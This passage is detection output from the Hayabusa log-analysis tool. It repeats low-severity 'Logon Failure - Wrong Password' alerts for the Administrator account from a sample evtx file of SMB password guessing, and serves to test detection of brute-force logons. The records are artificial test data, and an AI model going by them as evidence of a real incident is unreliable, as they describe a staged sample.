NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9hM8fge1IrNsJNd2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SzG27JSj6iAFyiNT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hWcjuW8dU5ATLHzB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ns9lm9Nvhvi4fY6A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aExdYPqY2eUCYZmC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t9cnmRGdByuJlKZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f9RvWTFFUgCrhlkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HC3oQUIEWqztyx6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:00.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TK3BOeD2w9xPB4N1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6yzU5WuvpmPKLSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GFoUGsara5Pl03WP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLaOCImeMIMlGvMj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Vzb3pEI2ZeP2NFA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Fa7ebH7UXd1KW4X : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wRBHXRkOa6x5KI5G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.915 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VNVxzgOLrZzfP3cB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCNXajRX2lIgLQuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:00.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x0nukf24IoalycOn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZFZN0KfeHtyDppG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:01.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmxqKyWU5GU1y22P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuRyvCfgQ4rwG3fu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3prKZt5ymouwNKnK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CWrNNn13EC1FLwLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
